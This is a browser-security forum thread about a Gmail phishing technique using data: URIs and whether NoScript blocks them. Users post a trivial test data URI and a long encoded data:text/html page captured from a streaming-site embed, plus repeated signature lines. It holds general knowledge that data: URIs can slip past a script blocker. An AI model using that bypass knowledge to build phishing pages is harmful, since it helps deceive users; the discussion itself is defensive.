https://www.wordfence.com/blog/2017/01/ ... -data-uri/
Does NoScript protect against this at all? If so how?
Subtle phishing scam targeting Gmail users
Subtle phishing scam targeting Gmail users
*Always* check the changelogs BEFORE updating that important software!
-
Re: Subtle phishing scam targeting Gmail users
noscript.allowURLBarJS
From what I recall (search earlier posts), there might be some issues with it?
(Its effectiveness, or not, possibly relating to a new window (as in it is bypassed on a new widow, first entry, kind of thing), possibly only with SeaMonkey. Don't recall anymore.)
According to Wikipedia, Data URI scheme, the exploit avenue is years old, so why it is just being "discovered"...?
javascript: / data: URI being bypassed
I didn't fully read, but:
data:,Hello%2C%20World!
is not an image, bypasses the NoScript block.
From what I recall (search earlier posts), there might be some issues with it?
(Its effectiveness, or not, possibly relating to a new window (as in it is bypassed on a new widow, first entry, kind of thing), possibly only with SeaMonkey. Don't recall anymore.)
According to Wikipedia, Data URI scheme, the exploit avenue is years old, so why it is just being "discovered"...?
javascript: / data: URI being bypassed
I didn't fully read, but:
data:,Hello%2C%20World!
is not an image, bypasses the NoScript block.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46 Lightning/.4.46
Re: Subtle phishing scam targeting Gmail users
My understanding is that the data: URI isn't typed or pasted in, it's loaded by clicking a link. NoScript treats that differently from a typed/pasted data: URI, but I don't remember what protection, if any, it does on data: URIs on whitelisted sites like Gmail.
And I seem to recall there were also issues with handling data: URIs loaded by clicking links, but that isn't turning up in searching.
And I seem to recall there were also issues with handling data: URIs loaded by clicking links, but that isn't turning up in searching.
*Always* check the changelogs BEFORE updating that important software!
-
Re: Subtle phishing scam targeting Gmail users
OK.
URL: http://openloadmovies.org/movies/the-three-stooges/
Center-click the video placeholder & you get something like:
(truncated)
Complete, https://pastebin.com/gTYxqDjp.
URL: http://openloadmovies.org/movies/the-three-stooges/
Center-click the video placeholder & you get something like:
(truncated)
Code: Select all
data:text/html,%3C!DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%3Chead%3E%3Cmeta%20charset%3D%22utf-8%22%20%2F%3E%3Cbase%20href%3D%22https%3A%2F%2Fopenload.co%2F%22%20%2F%3E%3Cscript%3Ewindow.exclude%3Dtrue%3Bwindow.turnoff%3Dtrue%3Bwindow.useCors%3Dtrue%3Bdocument.addEventListener(%22mouseup%22%2Cfunction()%7Blogpopup(1)%3B%7D%2Cfalse)%3Bwindow.corsToken%3D%22zxVHaaikYtBL5RgM1zXZNFv4Jq68x3dObkgqdFbq3eryWbyRKpvxVAiz60ypTWeW%22%3B%3C%2Fscript%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%2F%2F%3C!%5BCDATA%5B%0Atry%7Bif%20(!window.CloudFlare)%20%7Bvar%20CloudFlare%3D%5B%7Bverbose%3A0%2Cp%3A0%2Cbyc%3A0%2Cowlid%3A%22cf%22%2Cbag2%3A1%2Cmirage2%3A0%2Coracle%3A0%2Cpaths%3A%7Bcloudflare%3A%22%2Fcdn-cgi%2Fnexp%2Fdok3v%3D1613a3a185%2F%22%7D%2Catok%3A%220127ec569970300ae984d641e3d57198%22%2Cpetok%3A%227b7ee8e959d25e47574e5e409fe1c99b66ae14ee-1491060712-1800%22%2Czone%3A%22openload.co%22%2Crocket%3A%220%22%2Capps%3A%7B%22abetterbrowser%22%3A%7B%22ie%22%3A%228%22%2C%22opera%22%3A%2212.0%22%2C%22chrome%22%3A%222.9%22%2C%22safari%22%3A%223.0%22%2C%22firefox%22%3A%2220.0%22%7D%7D%7D%5D%3B!function(a%2Cb)%7Ba%3Ddocument.createElement(%22script%22)%2Cb%3Ddocument.getElementsByTagName(%22script%22)%5B0%5D%2Ca.async%3D!0%2Ca.src%3D%22%2F%2Fajax.cloudflare.com%2Fcdn-cgi%2Fnexp%2Fdok3v%3Df2befc48d1%2Fcloudflare.min.js%22%2Cb.parentNode.insertBefore(a%2Cb)%7D()%7D%7Dcatch(e)%7B%7D%3B%0A%2F%2F%5D%5D%3E%0A%3C%2Fscript%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%3Ewindow.shouldreport%3D%225TMkyEx-4HE%22%3Bwindow.filesize%3D630507718%3B%3C%2Fscript%3E%20%3C!--%5Bif%20lte%20IE%208%5D%3E%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22%2Fassets%2Fjs%2Fexcanvas.js%22%3E%3C%2Fscript%3E%3C!%5Bendif%5D--%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22og%3Atitle%22%20content%3D%22The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22og%3Adescription%22%20content%3D%22Stream%20The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%20via%20Openload%22%3E%0A%3Cmeta%20name%3D%22og%3Atype%22%20content%3D%22video.movie%22%3E%0A%3Cmeta%20name%3D%22og%3Aurl%22%20content%3D%22https%3A%2F%2Fopenload.co%2Fembed%2F5TMkyEx-4HE%2FThe_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22og%3Asitename%22%20content%3D%22Openload%22%3E%0A%3Cmeta%20name%3D%22og%3Aimage%22%20content%3D%22https%3A%2F%2Fthumb.oloadcdn.net%2Fsplash%2F5TMkyEx-4HE%2FH8_xqwq193E.jpg%22%3E%0A%3Cmeta%20name%3D%22twitter%3Acard%22%20content%3D%22summary_large_image%22%3E%0A%3Cmeta%20name%3D%22twitter%3Atitle%22%20content%3D%22The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22twitter%3Adescription%22%20content%3D%22Stream%20The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%20via%20Openload%22%3E%0A%3Cmeta%20name%3D%22twitter%3Aimage%22%20content%3D%22https%3A%2F%2Fthumb.oloadcdn.net%2Fsplash%2F5TMkyEx-4HE%2FH8_xqwq193E.jpg%22%3E%0A%3Cmeta%20name%3D%22robots%22%20content%3D%22noindex%22%3E%0A%3Clink%20href%3D%22https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fvideo.js%2F5.15.1%2Fvideo-js.min.css%22%20rel%3D%22stylesheet%22%3E%0A%3Clink%20href%3D%22%2Fassets%2Fcss%2Fvideo.js%2Folvideo.css%22%20rel%3D%22stylesheet%22%3E%0A%3Cscript%20src%3D%22%2Fassets%2Fjs%2Fjquery.min.js%22%3E%3C%2Fscript%3E%0A%3Cscript%20src%3D%22%2Fassets%2Fjs%2Fvideojs-ie8.min.3.js%22%3E%3C%2Fscript%3E%3Cscript%3E%0D%0Awindow._VideoLoaded%3Dfalse%3B%0D%0A%3C%2Fscript%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%3Cdiv%20id%3D%22mediaspace_wrapper%22%3E%0A%3Cdiv%20class%3D%22videocontainer%22%3E%0A%3Cinput%20type%3D%22file%22%20id%3D%22srtSelector%22%20style ...
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46 Lightning/.4.46
Re: Subtle phishing scam targeting Gmail users
For me it appears to give me the direct link to the video.
*Always* check the changelogs BEFORE updating that important software!
-
Re: Subtle phishing scam targeting Gmail users
Ah, I left out some steps, didn't I.
So...
URL: http://openloadmovies.org/movies/the-three-stooges/
By default, you should see a placeholder.
Center-click the placeholder.
Opens, https://openload.co/embed/5TMkyEx-4HE/T ... IFY_HI.mp4
Temporarily Allow, openload.co
Page refreshes & URL changes to a data: URI.
So...
URL: http://openloadmovies.org/movies/the-three-stooges/
By default, you should see a placeholder.
Center-click the placeholder.
Opens, https://openload.co/embed/5TMkyEx-4HE/T ... IFY_HI.mp4
Temporarily Allow, openload.co
Page refreshes & URL changes to a data: URI.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46 Lightning/.4.46
Re: Subtle phishing scam targeting Gmail users
Yep, I see it after following your steps, and then clicking the play button in the middle. It asks me whether I want to open or save the data URI.
*Always* check the changelogs BEFORE updating that important software!
-
Re: Subtle phishing scam targeting Gmail users
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46 Lightning/.4.46
Re: Subtle phishing scam targeting Gmail users
Thanks for the link, therube.
Top-level data: URIs are critical for me. Disabling that would make unusable. I hope that if they go that route, that there will be a way to re-enable top-level data: URIs.
Top-level data: URIs are critical for me. Disabling that would make unusable. I hope that if they go that route, that there will be a way to re-enable top-level data: URIs.
*Always* check the changelogs BEFORE updating that important software!
-